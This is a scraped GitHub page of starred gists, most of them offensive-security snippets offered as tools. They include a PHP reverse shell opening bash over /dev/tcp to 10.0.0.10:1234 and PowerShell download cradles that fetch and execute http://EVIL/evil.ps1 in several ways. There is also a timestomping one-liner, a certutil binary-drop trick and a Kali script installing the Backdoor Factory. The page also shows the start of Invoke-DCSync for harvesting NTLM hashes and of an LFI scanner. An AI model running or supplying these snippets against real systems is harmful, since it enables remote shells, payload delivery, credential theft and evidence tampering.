Skip to content

Instantly share code, notes, and snippets.

View boh's full-sized avatar

boh

215 followers · 235 following
View GitHub Profile
@obscuresec
obscuresec / gist:7b0cf71d7a8dd5e7b54c
Created May 20, 2014 00:28
PowerShell TimeStomp
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
@brandonmwest
brandonmwest / example.cs
Last active October 4, 2025 15:25
Generating base64-encoded Authorization headers in a variety of languages
httpClient.DefaultRequestHeaders.Authorization =
new AuthenticationHeaderValue(
"Basic",
Convert.ToBase64String(
System.Text.ASCIIEncoding.ASCII.GetBytes(
string.Format("{0}:{1}", username, password))));
@rshipp
rshipp / shell.php
Created July 17, 2014 15:06
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@hsiboy
hsiboy / lfi_scan_tool.php
Created August 13, 2014 16:50
LFI scanner
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>LFI Scan Tool</title>
</head>
<body>
<form method="post" action="?">
@mattifestation
mattifestation / drop_binary.bat
Created July 12, 2015 05:49
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
@atcuno
atcuno / gist:3425484ac5cce5298932
Last active March 29, 2026 03:23
HowTo: Privacy & Security Conscious Browsing

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 3, 2026 23:46
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@mrhelpmann
mrhelpmann / kali-thpb2.sh
Created September 16, 2015 19:28
I took all the recommended script code and condensed it into this one script. Tested on Kali 2. If you have an issue it is probably on the last few lines around "su - postgres".
service postgresql start
update-rc.d postgresql enable
msfupdate
msfdb init
msfdb start
echo "deb-src http://http.kali.org/kali sana main non-free contrib" >> /etc/apt/sources.list
echo "deb http://http.kali.org/kali sana main non-free contrib" >> /etc/apt/sources.list
apt-get update
apt-get install -y linux-headers-$(uname -r) python-pefile bdfproxy mitmproxy python-openssl openssl subversion python2.7-dev python git gcc make libpcap-dev python-elixir ldap-utils rwho rsh-client x11-apps finger
git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor-factory
@monoxgas
monoxgas / Invoke-DCSync.ps1
Last active December 2, 2024 08:46
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
@monoxgas
monoxgas / Rulz.py
Created October 14, 2015 17:31
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs